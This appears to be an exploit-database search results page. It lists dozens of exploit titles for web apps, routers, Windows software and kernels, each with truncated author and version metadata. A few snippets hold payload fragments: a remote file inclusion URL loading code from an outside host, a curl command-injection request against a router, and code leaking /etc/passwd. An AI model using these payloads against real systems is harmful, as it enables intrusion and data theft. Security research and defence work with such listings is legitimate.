47884 matches found
elearning-script 1.0 - Authentication Bypass
Exploit Title: elearning-script 1.0 - Authentication Bypass Author: riamloo Date: 2019-12-29 Vendor Homepage: https://github.com/amitkolloldey/elearning-script Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip Version: 1 CVE: N/A Tested on: Win 10 Discription: E...
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload Authenticated Date: 2020-07-15 Exploit Author: v1n1v131r4 Vendor Homepage: http://koken.me/ Software Link: https://www.softaculous.com/apps/cms/Koken Version: 0.22.24 Tested on: Linux PoC:...
iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path
Exploit Title: iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path Date: 2021-06-18 Exploit Author: Julio Aviña Vendor Homepage: https://www.i-funbox.com/en/index.html Software Link: https://www.i-funbox.com/download/ifunboxsetup4.2.exe Version: 4.2 Service File Version: 486.0.2.23...
Nxlog Community Edition 2.10.2150 - DoS (Poc)
Exploit Title: Nxlog Community Edition 2.10.2150 - DoS Poc Date: 15/12/2020 Exploit Author: Guillaume PETIT Vendor Homepage: https://nxlog.co Software Link: https://nxlog.co/products/nxlog-community-edition/download Version: 2.10.2150 Tested on: Linux Debian 10 && Windows Server 2019 CVE:...
Latrix 0.6.0 - 'txtaccesscode' SQL Injection
Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection Date: 03/30/2021 Exploit Author: cptsticky Vendor Homepage: https://sourceforge.net/projects/latrix Software Link: https://sourceforge.net/projects/latrix/files/latest/download Version: 0.6.0 Tested on: Ubuntu 20.04 POST...
LifeRay 7.2.1 GA2 - Stored XSS
Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution
Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal through th...
Fast PHP Chat 1.3 - 'my_item_search' SQL Injection
Exploit Title: Fast PHP Chat 1.3 - 'myitemsearch' SQL Injection Date: 15/04/2021 Exploit Author: Fatih Coskun Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076 Version: 1.3 Category: Webapps Tested on: Kali linux Description : The vulnerability allows a...
Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow Date: 2020-07-30 Author: Felipe Winsnes Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe Version: 2.6.18 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Proof of Concept: 1.- Run...
osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting Date: 2020-06-26 Exploit Author: Matthew Aberegg Vendor Homepage: https://osticket.com Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754 Version: osTicket 1.14.1 Tested o...
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'Webmin /file/show.cgi Remote Command...
ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access
Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution RCE & SSH Access Date: 2023-02-16 Exploit Author: [email protected] for NetworkSEC NWSSA-002-2023 Vendor Homepage: https://servers.asus.com/search?q=ASMB8 Version/Model: ASMB8 iKVM Firmware = 1.14.51 probably others Tested on: Linux...
Blitar Tourism 1.0 - Authentication Bypass SQLi
Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi Date: 13 April 2021 Exploit Author: sigeri94 Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/ Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master Version: 1....
Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting
Exploit Title: Jiofi 4 JMR 1140 Reflected Cross Site Scripting Date: 12.02.2019 Exploit Author: Ronnie T Baby Contact:https://www.linkedin.com/in/ronnietbaby Vendor Homepage: www.jio.com Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574 Category: Hardware Wifi Router Version:...
Online Learning System 2.0 - Remote Code Execution (RCE)
Exploit Title: Online Learning System 2.0 - Remote Code Execution RCE Date: 15/11/2021 Exploit Author: djebbaranon Vendor Homepage: https://github.com/oretnom23 Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearningv20.zip Version: 2.0 Tested on: Kali linux...
Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the...
DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting Authenticated Date: 2020-10-09 Exploit Author: Enes Özeser Vendor Homepage: https://dynpg.org/ Version: 4.9.1 Tested on: Windows & XAMPP == Tutorial alert"XSS"; == HTTP Request alert"XSS";...
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow
!/usr/bin/python HP Power Manager Administration Universal Buffer Overflow Exploit CVE 2009-2685 Tested on Win2k3 Ent SP2 English, Win XP Sp2 English Matteo Memelli ryujin A-T offensive-security.com www.offensive-security.com Spaghetti & Pwnsauce - 07/11/2009 ryujin@bt:$ ./hppowermanager.py...
4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection Authenticated Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.8 Tested on: Linux Source Analysis: Line 658 - User action defined if $action == "findimages" Line 661 - Vulnerable condition...
Microsoft Excel - OLE Arbitrary Code Execution
Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...
Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits a vulnerability in the handling of Windows Shortcut files .LNK...
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
/ Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c ver. 1.0...
ThinkAdmin 6 - Arbitrarily File Read
Exploit Title: ThinkAdmin 6 - Arbitrarily File Read Google Dork: N/A Date: 2020-09-14 Exploit Author: Hzllaga Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a Version: v6 =...
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
Exploit Title: PHP 5.x Shellshock Exploit bypass disablefunctions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror Version: 5. tested on 5.6.2 Tested on: Debian 7 and CentOS 5 an...
CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution
Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input before calling popen and allows an...
openMAINT 1.1-2.4.2 - Arbitrary File Upload
Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload Dork: N/A Date: 2020-08-19 Exploit Author: mrb3n Vendor Homepage: https://www.openmaint.org/en Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download Version: 1.1-2.4.2 Category: Webapps Teste...
Cabot 0.11.12 - Persistent Cross-Site Scripting
Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting Date: 2020-09-06 Exploit Author: Abhiram V Vendor Homepage: https://cabotapp.com/ Software Link: https://github.com/arachnys/cabot Version: 0.11.12 Tested on: Ubuntu Linux Introduction Cabot is a free, open-source, self-hosted...
OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting Date: 2020-05-11 Exploit Author: Vulnerability-Lab Vendor: https://www.openz.de/ https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References Source:...
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure Date: 2021-11-03 Exploit Author: Mayank Deshmukh Vendor Homepage: https://www.eclipse.org/jetty/ Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/ Version: 9.4.37 ≤ version ColdFusionX - Web Applicat...
Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow Unicode SEH PoC Vendor Homepage: http://www.codeblocks.org/ Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download Exploit Author: Paras Bhatia...
Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion
Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-30...
Simple Food Website 1.0 - Authentication Bypass
Exploit Title: Simple Food Website 1.0 - Authentication Bypass Date: 2021-04-03 Exploit Author: Viren Saroha illusion Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html Software Link:...
ECSIMAGING PACS 6.21.5 - SQL injection
Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection Date: 06/01/2021 Exploit Author: shoxxdj Vendor Homepage: https://www.medicalexpo.fr/ Version: 6.21.5 and bellow tested on 6.21.5,6.21.3 Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from SQLinjection vulnerability...
WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload
----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote --------------------------------------------------------------------------...
Medical Center Portal Management System 1.0 - Multiple Stored XSS
Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS Exploit Author: Saeed Bala Ahmed r0b0tG4nG Date: 2020-12-10 Google Dork: N/A Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html Software Link:...
Linux Kernel 2.6.x - Ptrace Privilege Escalation
/ source: https://www.securityfocus.com/bid/25774/info The Linux kernel is prone to a local privilege-escalation vulnerability. Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. Versions of Linux kernel prior t...
Fuel CMS 1.4.1 - Remote Code Execution (3)
Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution 3 Exploit Author: Padsala Trushal Date: 2021-11-03 Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 Version: ',epilog=f'EXAMPLE - python3 sys.argv0 -u http://10.10.21.74'...
MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
!/usr/bin/python Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution Authenticated Exploit Author: bzyo Twitter: @bzyo Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution Authenticated Date: 2020-10-01 Vulnerable Software:...
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion
Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Date: 2019-08-17 Exploit Author: Carlos E. Vieira Vendor Homepage: https://www.f5.com/products/big-ip-services Version: 0: return True else: return False else: return False def leakPasswd: print"+ Leaking /etc/passwd from server"...
Apache - Remote Memory Exhaustion (Denial of Service)
Apache httpd Remote Denial of Service memory exhaustion By Kingcope Year 2011 Will result in swapping memory to filesystem on the remote side plus killing of processes when running out of swap space. Remote System becomes unstable. use IO::Socket; use Parallel::ForkManager; sub usage print "Apach...
Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
Title: Microsoft Outlook Microsoft 365 MSO Version 2306 Build 16.0.16529.20100 32-bit - Remote Code Execution Author: nu11secur1ty Date: 07.07.2023 Vendor: https://www.microsoft.com/ Software: https://outlook.live.com/owa/ Reference:...
Netlink GPON Router 1.0.11 - Remote Code Execution
Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...
Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass)
Exploit Title: Digital Crime Report Management System 1.0 - SQL Injection Authentication Bypass Date: 13 April 2021 Exploit Author: Galuh Muhammad Iman Akbar GaluhID Vendor Homepage: https://iwantsourcecodes.com/digital-crime-report-management-system-in-php-with-source-code/ Software Link:...
Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption Date: December 8th 2020 Exploit Author: Tess Sluijter Vendor Homepage: https://www.tibco.com Version: 5.11x and before Tested on: MacOS, Linux, Windows Tibco password decryption exploit Background Tibco's documentation...
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation PowerShell Date: 2020-12-03 Exploit Author: 1F98D Original Author: Matteo Malvica Vendor Homepage: druva.com Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi Version: 6.6....
SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path
Exploit Title: SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path Discovery by: Mara Ramirez Discovery Date: 10-11-2020 Vendor Homepage: https://www.segurazo.com/download.html Software Links : https://www.segurazo.com/download.html Tested Version: 10.0.21.61 Vulnerability Type:...
Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting
Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting Date: 2020-09-01 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://savsoftquiz.com/ Software Link: https://savsoftquiz.com/web/demo.php Version: 5.0 Tested on: Windows 10/Kali Linux Contact:...
Docsify.js 4.11.4 - Reflective Cross-Site Scripting
Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting Date: 2020-06-22 Exploit Author: Amin Sharifi Vendor Homepage: https://docsify.js.org Software Link: https://github.com/docsifyjs/docsify Version: 4.11.4 Tested on: Windows 10 CVE : CVE-2020-7680 docsify.js uses fragment identifie...
YourFreeWorld Downline Builder - 'tr.php' SQL Injection
Downline Builder id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.yourfreeworld.com/script/downlinebuilder.php DorK : inurl:tr.php?id= Downline Exploit :...
Mida eFramework 2.9.0 - Remote Code Execution
Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution Google Dork: Server: Mida eFramework Date: 2020-08-27 Exploit Author: elbae Vendor Homepage: https://www.midasolutions.com/ Software Link: http://ova-efw.midasolutions.com/ Reference:...